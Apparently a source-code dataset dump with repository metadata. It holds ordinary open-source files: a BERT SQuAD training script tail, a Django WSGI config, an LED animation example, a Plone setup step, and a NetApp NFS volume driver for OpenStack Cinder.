features["unique_ids"] = create_int_feature([feature.unique_id])
features["input_ids"] = create_int_feature(feature.input_ids)
features["input_mask"] = create_int_feature(feature.input_mask)
features["segment_ids"] = create_int_feature(feature.segment_ids)
if self.is_training:
features["start_positions"] = create_int_feature(
[feature.start_position])
features["end_positions"] = create_int_feature(
[feature.end_position])
impossible = 0
if feature.is_impossible:
impossible = 1
features["is_impossible"] = create_int_feature([impossible])
tf_example = tf.train.Example(
features=tf.train.Features(
feature=features))
self._writer.write(tf_example.SerializeToString())
def close(self):
self._writer.close()
def validate_flags_or_throw(bert_config):
"""Validate the input FLAGS or throw an exception."""
tokenization.validate_case_matches_checkpoint(FLAGS.do_lower_case,
FLAGS.init_checkpoint)
if not FLAGS.do_train and not FLAGS.do_predict:
raise ValueError(
"At least one of `do_train` or `do_predict` must be True.")
if FLAGS.do_train:
if not FLAGS.train_file:
raise ValueError(
"If `do_train` is True, then `train_file` must be specified.")
if FLAGS.do_predict:
if not FLAGS.predict_file:
raise ValueError(
"If `do_predict` is True, then `predict_file` must be specified.")
if FLAGS.max_seq_length > bert_config.max_position_embeddings:
raise ValueError(
"Cannot use sequence length %d because the BERT model "
"was only trained up to sequence length %d" %
(FLAGS.max_seq_length, bert_config.max_position_embeddings))
if FLAGS.max_seq_length <= FLAGS.max_query_length + 3:
raise ValueError(
"The max_seq_length (%d) must be greater than max_query_length "
"(%d) + 3" % (FLAGS.max_seq_length, FLAGS.max_query_length))
def main(_):
tf.logging.set_verbosity(tf.logging.INFO)
bert_config = modeling.BertConfig.from_json_file(FLAGS.bert_config_file)
validate_flags_or_throw(bert_config)
tf.gfile.MakeDirs(FLAGS.output_dir)
tokenizer = tokenization.FullTokenizer(
vocab_file=FLAGS.vocab_file, do_lower_case=FLAGS.do_lower_case)
tpu_cluster_resolver = None
if FLAGS.use_tpu and FLAGS.tpu_name:
tpu_cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
FLAGS.tpu_name, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
is_per_host = tf.contrib.tpu.InputPipelineConfig.PER_HOST_V2
run_config = tf.contrib.tpu.RunConfig(
cluster=tpu_cluster_resolver,
master=FLAGS.master,
model_dir=FLAGS.output_dir,
save_checkpoints_steps=FLAGS.save_checkpoints_steps,
tpu_config=tf.contrib.tpu.TPUConfig(
iterations_per_loop=FLAGS.iterations_per_loop,
num_shards=FLAGS.num_tpu_cores,
per_host_input_for_training=is_per_host))
train_examples = None
num_train_steps = None
num_warmup_steps = None
if FLAGS.do_train:
train_examples = read_squad_examples(
input_file=FLAGS.train_file, is_training=True)
num_train_steps = int(
len(train_examples) /
FLAGS.train_batch_size *
FLAGS.num_train_epochs)
num_warmup_steps = int(num_train_steps * FLAGS.warmup_proportion)
# Pre-shuffle the input to avoid having to make a very large shuffle
# buffer in in the `input_fn`.
rng = random.Random(12345)
rng.shuffle(train_examples)
model_fn = model_fn_builder(
bert_config=bert_config,
init_checkpoint=FLAGS.init_checkpoint,
learning_rate=FLAGS.learning_rate,
num_train_steps=num_train_steps,
num_warmup_steps=num_warmup_steps,
use_tpu=FLAGS.use_tpu,
use_one_hot_embeddings=FLAGS.use_tpu)
# If TPU is not available, this will fall back to normal Estimator on CPU
# or GPU.
estimator = tf.contrib.tpu.TPUEstimator(
use_tpu=FLAGS.use_tpu,
model_fn=model_fn,
config=run_config,
train_batch_size=FLAGS.train_batch_size,
predict_batch_size=FLAGS.predict_batch_size)
if FLAGS.do_train:
# We write to a temporary file to avoid storing very large constant tensors
# in memory.
train_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "train.tf_record"),
is_training=True)
convert_examples_to_features(
examples=train_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=True,
output_fn=train_writer.process_feature)
train_writer.close()
tf.logging.info("***** Running training *****")
tf.logging.info(" Num orig examples = %d", len(train_examples))
tf.logging.info(" Num split examples = %d", train_writer.num_features)
tf.logging.info(" Batch size = %d", FLAGS.train_batch_size)
tf.logging.info(" Num steps = %d", num_train_steps)
del train_examples
train_input_fn = input_fn_builder(
input_file=train_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=True,
drop_remainder=True)
estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)
if FLAGS.do_predict:
eval_examples = read_squad_examples(
input_file=FLAGS.predict_file, is_training=False)
eval_writer = FeatureWriter(
filename=os.path.join(FLAGS.output_dir, "eval.tf_record"),
is_training=False)
eval_features = []
def append_feature(feature):
eval_features.append(feature)
eval_writer.process_feature(feature)
convert_examples_to_features(
examples=eval_examples,
tokenizer=tokenizer,
max_seq_length=FLAGS.max_seq_length,
doc_stride=FLAGS.doc_stride,
max_query_length=FLAGS.max_query_length,
is_training=False,
output_fn=append_feature)
eval_writer.close()
tf.logging.info("***** Running predictions *****")
tf.logging.info(" Num orig examples = %d", len(eval_examples))
tf.logging.info(" Num split examples = %d", len(eval_features))
tf.logging.info(" Batch size = %d", FLAGS.predict_batch_size)
all_results = []
predict_input_fn = input_fn_builder(
input_file=eval_writer.filename,
seq_length=FLAGS.max_seq_length,
is_training=False,
drop_remainder=False)
# If running eval on the TPU, you will need to specify the number of
# steps.
all_results = []
for result in estimator.predict(
predict_input_fn, yield_single_examples=True):
if len(all_results) % 1000 == 0:
tf.logging.info("Processing example: %d" % (len(all_results)))
unique_id = int(result["unique_ids"])
start_logits = [float(x) for x in result["start_logits"].flat]
end_logits = [float(x) for x in result["end_logits"].flat]
all_results.append(
RawResult(
unique_id=unique_id,
start_logits=start_logits,
end_logits=end_logits))
output_prediction_file = os.path.join(
FLAGS.output_dir, "predictions.json")
output_nbest_file = os.path.join(
FLAGS.output_dir, "nbest_predictions.json")
output_null_log_odds_file = os.path.join(
FLAGS.output_dir, "null_odds.json")
write_predictions(eval_examples, eval_features, all_results,
FLAGS.n_best_size, FLAGS.max_answer_length,
FLAGS.do_lower_case, output_prediction_file,
output_nbest_file, output_null_log_odds_file)
if __name__ == "__main__":
flags.mark_flag_as_required("vocab_file")
flags.mark_flag_as_required("bert_config_file")
flags.mark_flag_as_required("output_dir")
tf.app.run()
| [
"[email protected]"
] | |
81a8f7309966861e6a73d3cea111f8f0f441759e | 153d5ff918a33afb1e73fefab9e774672cf4f129 | /auth_demo_stripe/wsgi.py | 06be555707e70f63105bf12ae7bbb1f7f8d691c1 | [] | no_license | meganduffy/auth_demo_stripe | a67700e406fab62091ab52bbb72b0eede89c1f72 | 74c6e1d2af19221d78c4eb813513e5f1d36c3abe | refs/heads/master | 2021-01-17T10:01:22.309264 | 2017-03-06T11:44:39 | 2017-03-06T11:44:39 | 84,001,104 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | """
WSGI config for auth_demo_stripe project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "auth_demo_stripe.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
26c1bf3393e74fe359f62019bcd01a096dc2a25a | f662aa3ce7896ca0283cae38df8ef824c1b80c9a | /examples/larson_hue.py | e59f5ae5199f37f0ab3c97b555d030f940ee0d49 | [
"MIT"
] | permissive | pimoroni/plasma | bd7ddebbc60ae7cc9c2561408b52fc46bf810672 | 7857c44255285aac061a9064dd033fd63bbbda29 | refs/heads/master | 2023-02-10T13:27:17.565867 | 2023-01-30T17:27:28 | 2023-01-30T17:27:28 | 155,544,928 | 12 | 9 | MIT | 2021-11-06T04:14:19 | 2018-10-31T11:17:40 | Python | UTF-8 | Python | false | false | 1,548 | py | #!/usr/bin/env python3
import math
import time
import colorsys
from plasma import auto
NUM_PIXELS = 10 * 4
FALLOFF = 1.9
SCAN_SPEED = 4
plasma = auto(default=f"GPIO:14:15:pixel_count={NUM_PIXELS}")
if plasma.get_pixel_count() == 1:
raise RuntimeError("Uh, you can't larson scan *one* pixel!?")
plasma.set_clear_on_exit()
start_time = time.time()
while True:
delta = (time.time() - start_time)
# Offset is a sine wave derived from the time delta
# we use this to animate both the hue and larson scan
# so they are kept in sync with each other
offset = (math.sin(delta * SCAN_SPEED) + 1) / 2
# Use offset to pick the right colour from the hue wheel
hue = int(round(offset * 360))
# Maximum number basex on NUM_PIXELS
max_val = plasma.get_pixel_count() - 1
# Now we generate a value from 0 to max_val
offset = int(round(offset * max_val))
for x in range(plasma.get_pixel_count()):
sat = 1.0
val = max_val - (abs(offset - x) * FALLOFF)
val /= float(max_val) # Convert to 0.0 to 1.0
val = max(val, 0.0) # Ditch negative values
xhue = hue # Grab hue for this pixel
xhue += (1 - val) * 10 # Use the val offset to give a slight colour trail variation
xhue %= 360 # Clamp to 0-359
xhue /= 360.0 # Convert to 0.0 to 1.0
r, g, b = [int(c * 255) for c in colorsys.hsv_to_rgb(xhue, sat, val)]
plasma.set_pixel(x, r, g, b, val)
plasma.show()
time.sleep(0.001)
| [
"[email protected]"
] | |
9d14d6702c380b23bdbc1f209bb5f8a3e6a6beb7 | 46bab53f41324fa880626d80c7a175e11ec30f5b | /sinar/representatives/setuphandlers.py | f322b7a6cba088432f71f03cc810a8c9149343b1 | [] | no_license | joemariedimzon/sinar.representatives | 8d21b5447b65f55fbde809c74dc74be6bc0bfdf7 | 11d63647a1d82c739a6d4312363392f8a6ca79ed | refs/heads/master | 2021-01-18T05:00:12.128279 | 2015-07-07T07:51:19 | 2015-07-07T07:51:19 | 38,667,596 | 0 | 0 | null | 2015-07-07T06:07:04 | 2015-07-07T06:07:03 | null | UTF-8 | Python | false | false | 384 | py | from collective.grok import gs
from sinar.representatives import MessageFactory as _
@gs.importstep(
name=u'sinar.representatives',
title=_('sinar.representatives import handler'),
description=_(''))
def setupVarious(context):
if context.readDataFile('sinar.representatives.marker.txt') is None:
return
portal = context.getSite()
# do anything here
| [
"[email protected]"
] | |
a52afad79d275173735bfbc72a33cf1ba2a7a17e | a217801fdf840d97785f06a1e2381d6ed62d7852 | /volume/drivers/netapp/dataontap/nfs_base.py | 1e7c08ae0f1bae744bd926cd2f9e9962e8f06264 | [] | no_license | TonyChengTW/Cinder_Extend | fb05cdda9d925d1c8344595a19472125959e4830 | 5e20383660cf5c0340aa8fa3cf387bb8b59efc4b | refs/heads/master | 2020-06-18T09:54:06.834743 | 2016-11-30T03:01:16 | 2016-11-30T03:01:16 | 75,145,443 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,631 | py | # Copyright (c) 2012 NetApp, Inc. All rights reserved.
# Copyright (c) 2014 Ben Swartzlander. All rights reserved.
# Copyright (c) 2014 Navneet Singh. All rights reserved.
# Copyright (c) 2014 Clinton Knight. All rights reserved.
# Copyright (c) 2014 Alex Meade. All rights reserved.
# Copyright (c) 2014 Bob Callaway. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Volume driver for NetApp NFS storage.
"""
import math
import os
import re
import shutil
import threading
import time
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from oslo_utils import units
import six.moves.urllib.parse as urlparse
from cinder import exception
from cinder.i18n import _, _LE, _LI, _LW
from cinder.image import image_utils
from cinder import utils
from cinder.volume.drivers.netapp import options as na_opts
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.volume.drivers import nfs
LOG = logging.getLogger(__name__)
class NetAppNfsDriver(nfs.NfsDriver):
"""Base class for NetApp NFS driver for Data ONTAP."""
# do not increment this as it may be used in volume type definitions
VERSION = "1.0.0"
REQUIRED_FLAGS = ['netapp_login', 'netapp_password',
'netapp_server_hostname']
def __init__(self, *args, **kwargs):
na_utils.validate_instantiation(**kwargs)
self._execute = None
self._context = None
self._app_version = kwargs.pop("app_version", "unknown")
super(NetAppNfsDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(na_opts.netapp_connection_opts)
self.configuration.append_config_values(na_opts.netapp_basicauth_opts)
self.configuration.append_config_values(na_opts.netapp_transport_opts)
self.configuration.append_config_values(na_opts.netapp_img_cache_opts)
self.configuration.append_config_values(na_opts.netapp_nfs_extra_opts)
def set_execute(self, execute):
self._execute = execute
def do_setup(self, context):
super(NetAppNfsDriver, self).do_setup(context)
self._context = context
na_utils.check_flags(self.REQUIRED_FLAGS, self.configuration)
self.zapi_client = None
def check_for_setup_error(self):
"""Returns an error if prerequisites aren't met."""
super(NetAppNfsDriver, self).check_for_setup_error()
def get_pool(self, volume):
"""Return pool name where volume resides.
:param volume: The volume hosted by the driver.
:return: Name of the pool where given volume is hosted.
"""
return volume['provider_location']
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot."""
vol_size = volume.size
snap_size = snapshot.volume_size
self._clone_volume(snapshot.name, volume.name, snapshot.volume_id)
share = self._get_volume_location(snapshot.volume_id)
volume['provider_location'] = share
path = self.local_path(volume)
run_as_root = self._execute_as_root
if self._discover_file_till_timeout(path):
self._set_rw_permissions(path)
if vol_size != snap_size:
try:
self.extend_volume(volume, vol_size)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(
_LE("Resizing %s failed. Cleaning volume."),
volume.name)
self._execute('rm', path, run_as_root=run_as_root)
else:
raise exception.CinderException(
_("NFS file %s not discovered.") % volume['name'])
return {'provider_location': volume['provider_location']}
def create_snapshot(self, snapshot):
"""Creates a snapshot."""
self._clone_volume(snapshot['volume_name'],
snapshot['name'],
snapshot['volume_id'])
def delete_snapshot(self, snapshot):
"""Deletes a snapshot."""
nfs_mount = self._get_provider_location(snapshot.volume_id)
if self._volume_not_present(nfs_mount, snapshot.name):
return True
self._execute('rm', self._get_volume_path(nfs_mount, snapshot.name),
run_as_root=self._execute_as_root)
def _get_volume_location(self, volume_id):
"""Returns NFS mount address as <nfs_ip_address>:<nfs_mount_dir>."""
nfs_server_ip = self._get_host_ip(volume_id)
export_path = self._get_export_path(volume_id)
return nfs_server_ip + ':' + export_path
def _clone_volume(self, volume_name, clone_name, volume_id, share=None):
"""Clones mounted volume using NetApp API."""
raise NotImplementedError()
def _get_provider_location(self, volume_id):
"""Returns provider location for given volume."""
volume = self.db.volume_get(self._context, volume_id)
return volume.provider_location
def _get_host_ip(self, volume_id):
"""Returns IP address for the given volume."""
return self._get_provider_location(volume_id).rsplit(':')[0]
def _get_export_path(self, volume_id):
"""Returns NFS export path for the given volume."""
return self._get_provider_location(volume_id).rsplit(':')[1]
def _volume_not_present(self, nfs_mount, volume_name):
"""Check if volume exists."""
try:
self._try_execute('ls', self._get_volume_path(nfs_mount,
volume_name))
except processutils.ProcessExecutionError:
# If the volume isn't present
return True
return False
def _try_execute(self, *command, **kwargs):
# NOTE(vish): Volume commands can partially fail due to timing, but
# running them a second time on failure will usually
# recover nicely.
tries = 0
while True:
try:
self._execute(*command, **kwargs)
return True
except processutils.ProcessExecutionError:
tries += 1
if tries >= self.configuration.num_shell_tries:
raise
LOG.exception(_LE("Recovering from a failed execute. "
"Try number %s"), tries)
time.sleep(tries ** 2)
def _get_volume_path(self, nfs_share, volume_name):
"""Get volume path (local fs path) for given volume name on given nfs
share.
@param nfs_share string, example 172.18.194.100:/var/nfs
@param volume_name string,
example volume-91ee65ec-c473-4391-8c09-162b00c68a8c
"""
return os.path.join(self._get_mount_point_for_share(nfs_share),
volume_name)
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume."""
vol_size = volume.size
src_vol_size = src_vref.size
self._clone_volume(src_vref.name, volume.name, src_vref.id)
share = self._get_volume_location(src_vref.id)
volume['provider_location'] = share
path = self.local_path(volume)
if self._discover_file_till_timeout(path):
self._set_rw_permissions(path)
if vol_size != src_vol_size:
try:
self.extend_volume(volume, vol_size)
except Exception as e:
LOG.error(
_LE("Resizing %s failed. Cleaning volume."),
volume.name)
self._execute('rm', path,
run_as_root=self._execute_as_root)
raise e
else:
raise exception.CinderException(
_("NFS file %s not discovered.") % volume['name'])
return {'provider_location': volume['provider_location']}
def _update_volume_stats(self):
"""Retrieve stats info from volume group."""
raise NotImplementedError()
def copy_image_to_volume(self, context, volume, image_service, image_id):
"""Fetch the image from image_service and write it to the volume."""
super(NetAppNfsDriver, self).copy_image_to_volume(
context, volume, image_service, image_id)
LOG.info(_LI('Copied image to volume %s using regular download.'),
volume['name'])
self._register_image_in_cache(volume, image_id)
def _register_image_in_cache(self, volume, image_id):
"""Stores image in the cache."""
file_name = 'img-cache-%s' % image_id
LOG.info(_LI("Registering image in cache %s"), file_name)
try:
self._do_clone_rel_img_cache(
volume['name'], file_name,
volume['provider_location'], file_name)
except Exception as e:
LOG.warning(_LW('Exception while registering image %(image_id)s'
' in cache. Exception: %(exc)s')
% {'image_id': image_id, 'exc': e.__str__()})
def _find_image_in_cache(self, image_id):
"""Finds image in cache and returns list of shares with file name."""
result = []
if getattr(self, '_mounted_shares', None):
for share in self._mounted_shares:
dir = self._get_mount_point_for_share(share)
file_name = 'img-cache-%s' % image_id
file_path = '%s/%s' % (dir, file_name)
if os.path.exists(file_path):
LOG.debug('Found cache file for image %(image_id)s'
' on share %(share)s'
% {'image_id': image_id, 'share': share})
result.append((share, file_name))
return result
def _do_clone_rel_img_cache(self, src, dst, share, cache_file):
"""Do clone operation w.r.t image cache file."""
@utils.synchronized(cache_file, external=True)
def _do_clone():
dir = self._get_mount_point_for_share(share)
file_path = '%s/%s' % (dir, dst)
if not os.path.exists(file_path):
LOG.info(_LI('Cloning from cache to destination %s'), dst)
self._clone_volume(src, dst, volume_id=None, share=share)
_do_clone()
@utils.synchronized('clean_cache')
def _spawn_clean_cache_job(self):
"""Spawns a clean task if not running."""
if getattr(self, 'cleaning', None):
LOG.debug('Image cache cleaning in progress. Returning... ')
return
else:
# Set cleaning to True
self.cleaning = True
t = threading.Timer(0, self._clean_image_cache)
t.start()
def _clean_image_cache(self):
"""Clean the image cache files in cache of space crunch."""
try:
LOG.debug('Image cache cleaning in progress.')
thres_size_perc_start =\
self.configuration.thres_avl_size_perc_start
thres_size_perc_stop = \
self.configuration.thres_avl_size_perc_stop
for share in getattr(self, '_mounted_shares', []):
try:
total_size, total_avl = \
self._get_capacity_info(share)
avl_percent = int((total_avl / total_size) * 100)
if avl_percent <= thres_size_perc_start:
LOG.info(_LI('Cleaning cache for share %s.'), share)
eligible_files = self._find_old_cache_files(share)
threshold_size = int(
(thres_size_perc_stop * total_size) / 100)
bytes_to_free = int(threshold_size - total_avl)
LOG.debug('Files to be queued for deletion %s',
eligible_files)
self._delete_files_till_bytes_free(
eligible_files, share, bytes_to_free)
else:
continue
except Exception as e:
LOG.warning(_LW('Exception during cache cleaning'
' %(share)s. Message - %(ex)s')
% {'share': share, 'ex': e.__str__()})
continue
finally:
LOG.debug('Image cache cleaning done.')
self.cleaning = False
def _shortlist_del_eligible_files(self, share, old_files):
"""Prepares list of eligible files to be deleted from cache."""
raise NotImplementedError()
def _find_old_cache_files(self, share):
"""Finds the old files in cache."""
mount_fs = self._get_mount_point_for_share(share)
threshold_minutes = self.configuration.expiry_thres_minutes
cmd = ['find', mount_fs, '-maxdepth', '1', '-name',
'img-cache*', '-amin', '+%s' % threshold_minutes]
res, _err = self._execute(*cmd, run_as_root=self._execute_as_root)
if res:
old_file_paths = res.strip('\n').split('\n')
mount_fs_len = len(mount_fs)
old_files = [x[mount_fs_len + 1:] for x in old_file_paths]
eligible_files = self._shortlist_del_eligible_files(
share, old_files)
return eligible_files
return []
def _delete_files_till_bytes_free(self, file_list, share, bytes_to_free=0):
"""Delete files from disk till bytes are freed or list exhausted."""
LOG.debug('Bytes to free %s', bytes_to_free)
if file_list and bytes_to_free > 0:
sorted_files = sorted(file_list, key=lambda x: x[1], reverse=True)
mount_fs = self._get_mount_point_for_share(share)
for f in sorted_files:
if f:
file_path = '%s/%s' % (mount_fs, f[0])
LOG.debug('Delete file path %s', file_path)
@utils.synchronized(f[0], external=True)
def _do_delete():
if self._delete_file(file_path):
return True
return False
if _do_delete():
bytes_to_free -= int(f[1])
if bytes_to_free <= 0:
return
def _delete_file(self, path):
"""Delete file from disk and return result as boolean."""
try:
LOG.debug('Deleting file at path %s', path)
cmd = ['rm', '-f', path]
self._execute(*cmd, run_as_root=self._execute_as_root)
return True
except Exception as ex:
LOG.warning(_LW('Exception during deleting %s'), ex.__str__())
return False
def clone_image(self, context, volume,
image_location, image_meta,
image_service):
"""Create a volume efficiently from an existing image.
image_location is a string whose format depends on the
image service backend in use. The driver should use it
to determine whether cloning is possible.
Returns a dict of volume properties eg. provider_location,
boolean indicating whether cloning occurred.
"""
image_id = image_meta['id']
cloned = False
post_clone = False
try:
cache_result = self._find_image_in_cache(image_id)
if cache_result:
cloned = self._clone_from_cache(volume, image_id, cache_result)
else:
cloned = self._direct_nfs_clone(volume, image_location,
image_id)
if cloned:
post_clone = self._post_clone_image(volume)
except Exception as e:
msg = e.msg if getattr(e, 'msg', None) else e.__str__()
LOG.info(_LI('Image cloning unsuccessful for image'
' %(image_id)s. Message: %(msg)s')
% {'image_id': image_id, 'msg': msg})
vol_path = self.local_path(volume)
volume['provider_location'] = None
if os.path.exists(vol_path):
self._delete_file(vol_path)
finally:
cloned = cloned and post_clone
share = volume['provider_location'] if cloned else None
bootable = True if cloned else False
return {'provider_location': share, 'bootable': bootable}, cloned
def _clone_from_cache(self, volume, image_id, cache_result):
"""Clones a copy from image cache."""
cloned = False
LOG.info(_LI('Cloning image %s from cache'), image_id)
for res in cache_result:
# Repeat tries in other shares if failed in some
(share, file_name) = res
LOG.debug('Cache share: %s', share)
if (share and
self._is_share_vol_compatible(volume, share)):
try:
self._do_clone_rel_img_cache(
file_name, volume['name'], share, file_name)
cloned = True
volume['provider_location'] = share
break
except Exception:
LOG.warning(_LW('Unexpected exception during'
' image cloning in share %s'), share)
return cloned
def _direct_nfs_clone(self, volume, image_location, image_id):
"""Clone directly in nfs share."""
LOG.info(_LI('Checking image clone %s from glance share.'), image_id)
cloned = False
image_locations = self._construct_image_nfs_url(image_location)
run_as_root = self._execute_as_root
for loc in image_locations:
share = self._is_cloneable_share(loc)
if share and self._is_share_vol_compatible(volume, share):
LOG.debug('Share is cloneable %s', share)
volume['provider_location'] = share
(__, ___, img_file) = loc.rpartition('/')
dir_path = self._get_mount_point_for_share(share)
img_path = '%s/%s' % (dir_path, img_file)
img_info = image_utils.qemu_img_info(img_path,
run_as_root=run_as_root)
if img_info.file_format == 'raw':
LOG.debug('Image is raw %s', image_id)
self._clone_volume(
img_file, volume['name'],
volume_id=None, share=share)
cloned = True
break
else:
LOG.info(
_LI('Image will locally be converted to raw %s'),
image_id)
dst = '%s/%s' % (dir_path, volume['name'])
image_utils.convert_image(img_path, dst, 'raw',
run_as_root=run_as_root)
data = image_utils.qemu_img_info(dst,
run_as_root=run_as_root)
if data.file_format != "raw":
raise exception.InvalidResults(
_("Converted to raw, but"
" format is now %s") % data.file_format)
else:
cloned = True
self._register_image_in_cache(
volume, image_id)
break
return cloned
def _post_clone_image(self, volume):
"""Do operations post image cloning."""
LOG.info(_LI('Performing post clone for %s'), volume['name'])
vol_path = self.local_path(volume)
if self._discover_file_till_timeout(vol_path):
self._set_rw_permissions(vol_path)
self._resize_image_file(vol_path, volume['size'])
return True
raise exception.InvalidResults(
_("NFS file could not be discovered."))
def _resize_image_file(self, path, new_size):
"""Resize the image file on share to new size."""
LOG.debug('Checking file for resize')
if self._is_file_size_equal(path, new_size):
return
else:
LOG.info(_LI('Resizing file to %sG'), new_size)
image_utils.resize_image(path, new_size,
run_as_root=self._execute_as_root)
if self._is_file_size_equal(path, new_size):
return
else:
raise exception.InvalidResults(
_('Resizing image file failed.'))
def _is_file_size_equal(self, path, size):
"""Checks if file size at path is equal to size."""
data = image_utils.qemu_img_info(path,
run_as_root=self._execute_as_root)
virt_size = data.virtual_size / units.Gi
if virt_size == size:
return True
else:
return False
def _discover_file_till_timeout(self, path, timeout=45):
"""Checks if file size at path is equal to size."""
# Sometimes nfs takes time to discover file
# Retrying in case any unexpected situation occurs
retry_seconds = timeout
sleep_interval = 2
while True:
if os.path.exists(path):
return True
else:
if retry_seconds <= 0:
LOG.warning(_LW('Discover file retries exhausted.'))
return False
else:
time.sleep(sleep_interval)
retry_seconds -= sleep_interval
def _is_cloneable_share(self, image_location):
"""Finds if the image at location is cloneable."""
conn, dr = self._check_get_nfs_path_segs(image_location)
return self._check_share_in_use(conn, dr)
def _check_get_nfs_path_segs(self, image_location):
"""Checks if the nfs path format is matched.
WebNFS url format with relative-path is supported.
Accepting all characters in path-names and checking
against the mounted shares which will contain only
allowed path segments. Returns connection and dir details.
"""
conn, dr = None, None
if image_location:
nfs_loc_pattern = \
('^nfs://(([\w\-\.]+:{1}[\d]+|[\w\-\.]+)(/[^\/].*)'
'*(/[^\/\\\\]+)$)')
matched = re.match(nfs_loc_pattern, image_location, flags=0)
if not matched:
LOG.debug('Image location not in the'
' expected format %s', image_location)
else:
conn = matched.group(2)
dr = matched.group(3) or '/'
return conn, dr
def _share_match_for_ip(self, ip, shares):
"""Returns the share that is served by ip.
Multiple shares can have same dir path but
can be served using different ips. It finds the
share which is served by ip on same nfs server.
"""
raise NotImplementedError()
def _check_share_in_use(self, conn, dir):
"""Checks if share is cinder mounted and returns it."""
try:
if conn:
host = conn.split(':')[0]
ip = na_utils.resolve_hostname(host)
share_candidates = []
for sh in self._mounted_shares:
sh_exp = sh.split(':')[1]
if sh_exp == dir:
share_candidates.append(sh)
if share_candidates:
LOG.debug('Found possible share matches %s',
share_candidates)
return self._share_match_for_ip(ip, share_candidates)
except Exception:
LOG.warning(_LW("Unexpected exception while "
"short listing used share."))
return None
def _construct_image_nfs_url(self, image_location):
"""Construct direct url for nfs backend.
It creates direct url from image_location
which is a tuple with direct_url and locations.
Returns array of urls with nfs scheme if nfs store
else returns url. It needs to be verified
by backend before use.
"""
direct_url, locations = image_location
if not direct_url and not locations:
raise exception.NotFound(_('Image location not present.'))
urls = []
if not locations:
urls.append(direct_url)
else:
for location in locations:
url = location['url']
if not location['metadata']:
urls.append(url)
break
location_type = location['metadata'].get('type')
if not location_type or location_type.lower() != "nfs":
urls.append(url)
break
share_location = location['metadata'].get('share_location')
mountpoint = location['metadata'].get('mountpoint')
if not share_location or not mountpoint:
urls.append(url)
break
url_parse = urlparse.urlparse(url)
abs_path = os.path.join(url_parse.netloc, url_parse.path)
rel_path = os.path.relpath(abs_path, mountpoint)
direct_url = "%s/%s" % (share_location, rel_path)
urls.append(direct_url)
return urls
def extend_volume(self, volume, new_size):
"""Extend an existing volume to the new size."""
LOG.info(_LI('Extending volume %s.'), volume['name'])
path = self.local_path(volume)
self._resize_image_file(path, new_size)
def _is_share_vol_compatible(self, volume, share):
"""Checks if share is compatible with volume to host it."""
raise NotImplementedError()
def _check_share_can_hold_size(self, share, size):
"""Checks if volume can hold image with size."""
_tot_size, tot_available = self._get_capacity_info(
share)
if tot_available < size:
msg = _("Container size smaller than required file size.")
raise exception.VolumeDriverException(msg)
def _move_nfs_file(self, source_path, dest_path):
"""Moves source to destination."""
@utils.synchronized(dest_path, external=True)
def _move_file(src, dst):
if os.path.exists(dst):
LOG.warning(_LW("Destination %s already exists."), dst)
return False
self._execute('mv', src, dst, run_as_root=self._execute_as_root)
return True
try:
return _move_file(source_path, dest_path)
except Exception as e:
LOG.warning(_LW('Exception moving file %(src)s. Message - %(e)s')
% {'src': source_path, 'e': e})
return False
def _get_export_ip_path(self, volume_id=None, share=None):
"""Returns export ip and path.
One of volume id or share is used to return the values.
"""
if volume_id:
host_ip = self._get_host_ip(volume_id)
export_path = self._get_export_path(volume_id)
elif share:
host_ip = share.split(':')[0]
export_path = share.split(':')[1]
else:
raise exception.InvalidInput(
'A volume ID or share was not specified.')
return host_ip, export_path
def _get_share_capacity_info(self, nfs_share):
"""Returns the share capacity metrics needed by the scheduler."""
used_ratio = self.configuration.nfs_used_ratio
oversub_ratio = self.configuration.nfs_oversub_ratio
# The scheduler's capacity filter will reduce the amount of
# free space that we report to it by the reserved percentage.
reserved_ratio = 1 - used_ratio
reserved_percentage = round(100 * reserved_ratio)
total_size, total_available = self._get_capacity_info(nfs_share)
apparent_size = total_size * oversub_ratio
apparent_size_gb = na_utils.round_down(
apparent_size / units.Gi, '0.01')
apparent_free_size = total_available * oversub_ratio
apparent_free_gb = na_utils.round_down(
float(apparent_free_size) / units.Gi, '0.01')
capacity = dict()
capacity['reserved_percentage'] = reserved_percentage
capacity['total_capacity_gb'] = apparent_size_gb
capacity['free_capacity_gb'] = apparent_free_gb
return capacity
def _get_capacity_info(self, nfs_share):
"""Get total capacity and free capacity in bytes for an nfs share."""
export_path = nfs_share.rsplit(':', 1)[1]
return self.zapi_client.get_flexvol_capacity(export_path)
def _check_volume_type(self, volume, share, file_name):
"""Match volume type for share file."""
raise NotImplementedError()
def _convert_vol_ref_share_name_to_share_ip(self, vol_ref):
"""Converts the share point name to an IP address
The volume reference may have a DNS name portion in the share name.
Convert that to an IP address and then restore the entire path.
:param vol_ref: Driver-specific information used to identify a volume
:return: A volume reference where share is in IP format.
"""
# First strip out share and convert to IP format.
share_split = vol_ref.rsplit(':', 1)
vol_ref_share_ip = na_utils.resolve_hostname(share_split[0])
# Now place back into volume reference.
